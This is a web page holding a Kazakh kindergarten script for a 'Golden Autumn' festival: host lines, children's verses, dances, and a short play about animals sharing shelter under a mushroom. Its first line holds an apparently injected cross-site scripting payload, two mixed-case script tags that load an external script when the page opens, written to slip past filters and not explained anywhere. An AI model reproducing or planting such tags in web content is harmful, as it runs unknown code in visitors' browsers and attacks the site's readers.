<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.11.2018

«Алтын күз, әсем айналам, Еліне береке

сыйлаған»

Жүргізуші: Қарсы алайық бәріміз,

                   

 Жасымыз бен кәріміз.

                   

 Қырдан кепті қыдырып,

                     Алтын

күз бізге нұр төгіп.

Тілегім аман болсын ел іргесі,

Алтын күз қайта келді берекесі.

Молшылықтың жаршысы бола білді,

 Алтын күз-ырыс, береке, бірлік ала келді.

Армысыздар құрметті ұстаздар мен ата-аналар, қадірлі қонақтар! «Алтын күз,

әсем айналам, Еліне береке сыйлаған» атты ертеңгілігімізге қош келдіңіздер!

Би: Құрманға кел.

Жүргізуші:  Балалар, бүгін

барлығымыз күз мерекесіне  жиналдық. Қонақтар да келді. Бірақ біздің

мерекеге біреу жетіспейді.Сендер білесіндер ме ол кім?

Балалар: Ол Алтын күз.

Жүргізуші: Ендеше Алтын күзді ортаға

шақырайық.

Бірге: Алтын күз, алтын күз!

Алтын күз: Сәлеметсіндер ме, балалар!

Балалар: Сәлеметсіз бе, Алтын күз!

Алтын күз: Береке бақ дарыған,

                      Жомарт көңіл жарқын жаз.

                      Сары алтынға малынған,

               Алтын

күз деген мен болам. Армысыздар , құрметті қонақтар, кішкентай бүлдіршіндер!

Мен мерекеге кешігіп қалдым ба?

Балалар:  Жоқ.

Алтын күз: Балалар, сендерді

көргеніме қуаныштымын. Мен сендерге бір жұмбақ жасырайын.

                    

 Ағайынды бәрі

                     

Шықса жасыл

                     

Түссе –сары. Бұл не?

Балалар: Жапырақ.

Алтын күз: Дұрыс таптындар,

жарайсындар!

 

Жүргізуші: Алтын күз, біздің балалар күз

туралы өлен, тақпақтар біледі.  Сіз жәйланып отырып, балалардың өнерін

тамашалаңыз.

 

Альбина:

Қуаныштың ағайын,

Қоңырауын қағайын.

Қуандырып біздерді,

Өлкемізге күз келді.

 

Еркебұлан:

Астық жеміс жиылды,

Қамбамызға құйылды.

Ардақты күз мың алғыс,

Алдық өнім сыйынды.

 

Сымбат:

Өнім үйіп тастадық,

Оқуды да бастадық.

Берекелі алтын күз,

Ашық болсын аспаның

Нұрхан:

Берекесін сыйлауға,

Өлкемізге күз келді.

Жемістерін жинауға,

Шақырады біздерді.

Қарақат:

Ұшты

талдан жапырақ,

Сары

көбелек секілді.

Аспанда жай шатырлап,

Тамшы жерге секілді.

Ескендір:

Күн шуаққа маужырап,

Жатыр еді атырап,

Ағаштардан жамырап,

Ұшты кенет жапырақ

Зарина:

Қуандырып біздерді,

Мерекелі күз келді.

Кел жемісті алтын күз,

Кемелденсін халқымыз.

Гаусар:

Кездескен сон күзімен ,

Бұтағынан үзілген,

Ай жапырақ-сары алтын,

Айналаның бәрі алтын.

Аяжан:

Қара бұлт қабағын түйеді,

Бұталар боз қырау киеді

Осы ма, осы ма күз деген

Бақшаға баратын бізбенен.

Нұрсат:

Гүл жайнаған даланың,

Жапырағы солыпты,

Таңырқадым, Қарадым,

Танымастай болыпты.

Әдемі:

Жүзім, алма жинаймыз,

Алтын мақта тереміз,

Үлкендерді сыйлаймыз,

Көмектесе береміз.

 

 

Айлин:

Айнала сары ала,

Қырманға дән тола,

Жемістер пісіпті,

Қоймаға түсіпті.

Жүргізуші: Ән салыңдар күліңдер

Жайнап гүлдей жүріңдер

Күздің тойын тойлайық

Би билейік, ойнайық.

Ән: «Кап-Кап, тук-тук» қабыл алыңыздар!

Алтын күз: Бәрекелді, керемет!

( Осы кезде әуен ойналып Саңырауқұлақ саясында ертегісі

басталады.)

Автор:

Бір күні Құмырсқа жаңбыр

астында қалды. Қайда тығылуға болады? Қараса, алқапта кіп-кішкентай

саңырауқұлақ өсіп тұр екен. Жүгіріп барып саңырауқұлақтың әдемі қалпақшасының

астына тығылды. Жауын сіркіреп жауып тұр.

Бір кезде қанаттары суланып, әрең ұшып Көбелек келеді:

Көбелек: Құмырсқа, құмырсқа! Үстім су болды, ұша алмаймын.

Санырауқұлақтың астына мен де тығылайыншы!

Құмырсқа: Мен сені қайда кіргіземін!? Өзім де әрең сиып тұрмын.

Көбелек: Түк те етпейді, көңіліміз кең болса, бәріміз сиямыз!

Құмырсқа: Жарайды көбелек, екеуміз сиямыз.

Автор: Жаңбыр тіпті қатты жауа бастады. Осы кезде

саңырауқұлақтың қасына ентігіп жүгіріп тышқан келеді.

Тышқан: Кіргізіңдерші мені! Үстім су болды.

Құмырсқа: Сені кайда кіргіземіз?

Көбелек: Көрмейсің бе, өзімізге де орын жетпей тұр.

Тышқан: Қысылып көрейікші.

Автор: Үшеуі саңырауқұлақтың астына тығылды. Саңырауқұлақтың

қасына секіріп торғай келді.

Торғай: Қанаттарым су болды, шаршадым. Жаңбыр біткенше

саңырауқұлақтың астына кіруге бола ма? Үстімді кептіріп алайыншы.

Көбелек: Орын жоқ қой, сені қайда кіргіземіз?

Торғай: Өтінемін, жылжып көріңдерші!

Құмырсқа: Жарайды, кіре ғой!

Автор: Құмырсқа, Көбелек, Тышқан жылжып, саңырауқұлақтың астына

Торғайды да кіргізді.

Алқапқа осы арада ырғып шыққан Қоян саңырауқұлақты көріп

айқай салды.

Қоян: Құтқарыңдар! Менің артымнан Түлкі қуып келе жатыр, қай

тесікке тығыламын, қай жерге жасырынамын? Көмектесіңдер!

Көбелек: Тағы қысылысып көрейікшіғ, Қоянның түрі сондай аянышты!

Автор: Қоян да тығылып үлгерді, дәл сол кезде Түлкі жүгіріп

келді.

Түлкі: Осы жерде Қоян тығылып тұрған жоқ па?

Бәрі: Жоқ көрмедік.

Автор: Түлкі саңырауқұлаққа жақындап, тұмсығымен  түрткілеп иіскей бастады.

Түлкі: Осы жерде Қоян тығылып тұрған жоқ па?

Көбелек: Ол бұл жерде қалай тығылады, өзіміз зорға сидық!

Автор: Түлкі сары құйрығымен әрі- бері бұлаңдатып кетіп қалды.

Жаңбыр осы кезде тоқтап күннің көзі жарқырай ашылды. Саңырауқұлақтың

астындағылардың бәрі қуана- қуана алқапқа жүгіре шықты. Құмырсқа ойланып қалды?

Құмырсқа: Ол қалай болды? Менің өзіме тар болды, ал бәрімізге орын

табылды, кішкентай жерге сыйып кеттік.

Көбелек: Көңіліміз кең болса, бәріміз де сиямыз.

Жүргізуші: Жарайсыңдар, балалар! «Алтын күз» енді біздің қыздарымыздың әсем биін тамашалаңыз.

«Қуыршақ» биі.

Алтын күз: Өте жақсы,әдемі

билейді екенсіңдер, рахмет сендерге қыздар. Қандай керемет! Қандай ақылды

балаларсыңдар! 

Жүргізуші: Енді әсем әнімізді қабыл

алыңыз!

«Қарлығаш» әні

Жүргізуші: Бүлдіршінмен

бәріміз,

             

            Отбасындай бір ұямыз

             

            Береміз ендеше 

             

            Би өнеріне кезегін.

   Ортада бір топ бүлдіршіндерімізді

қошеметтеп қарсы алайық.

 

«Көкөністер

мен жемістер» биі

Адия:

Менің атым-қызанақ,

Тұзды сеуіп молырақ.

Банкілерге салыңыз,

Аузын мықтап жабыңыз.

Тағамға дәм қосамын,

Қыста тәбет ашамын.

Роллан:

Мен – шиемін, шиемін,

Күннің көзін сүйемін.

Қажеттімін адамға.

Оны жақсы білемін.

Данияр:

Мен-қиярмын, сәндімін,

Салаттардың сәнімін.

Дәруменім мол менің,

Жегенге қуат сыйлаймын!

Адель:

Таңдандырар бәрін

Асқабақпын дәмді

Кептірілген дәнім

Таптырмайтын дәрі!

Ибрагим:

Ең тәтті зат секерді,

Қызылшадан алады.

Денсаулыққа пайда деп,

Қызылшаны айтады.

Ал балақай біліп қой,

Қызылшамын пайдалы.

Алуа:

Мен алмұртпын,алмұртпын

Аузындамын бар жұрттың.

Әліби:

Мен сәбізбін, сәбізбін

Ұзын қызғылт боламын

Мені қоян көргенде

Мәзі болады секілдеп

Бекжан:

Мен өрікпін, өрікпін

Табиғатқа көрікпін.

Айнара:

Мен жүзіммін, жүзіммін.

Моншақ болып тізілдім.

Айана:

Мен алмамын, алмамын,

Балдай тәтті бар дәмім.

Иса:

Мен жүзіммін, жүзіммін.

Моншақ болып тізілдім.

Манат:

Мен өрікпін, өрікпін,

Дәміммен тәтті еліттім.

Сүйіктімін сәбилерге,

Айтпасам да бөліп тым.

Елнұр:

Мен-алмамын, алмамын,

Таңдандырар бал дәмім.

Пісіп толдым, мінекей!

Баптап ерек бағбаным.

«Алтын күз» өленің тамашалыныздар

Жүргізуші: Алтын күз, балалардың

өнерлері ұнады ма?

Алтын күз: Рахмет, балалар, маған мереке

қатты ұнады. Ал енді менің орманға баратын

уақытым болды

                            

Берекелі бақ-дәулет,

                            

Арта түссін тойланып.

                            

Сау болындар, балалар,

                            

Келгенше жыл айналып

Ал, тәрбиеші апай,

менің балаларға әкелген сыйлығым бар еді. Мен соны сізге берейін балаларға

таратып берінізші.

Жүргізуші: Балалар,

Алтын күзге рахмет айтайық!

Құрметті қонақтар, ата-аналар бүгінгі

«Алтын күз, әсем айналам, Еліне береке сыйлаған» -атты ертеңгілігімізді аяқтай

отырып, күз берекелі, астықты болсын демекпіз.

  Шағын орталығының әдіскері:     Ахметкалиева К.Б

Просмотров: 842


Пікір қосу



Деректерді қолтаңбаға қосу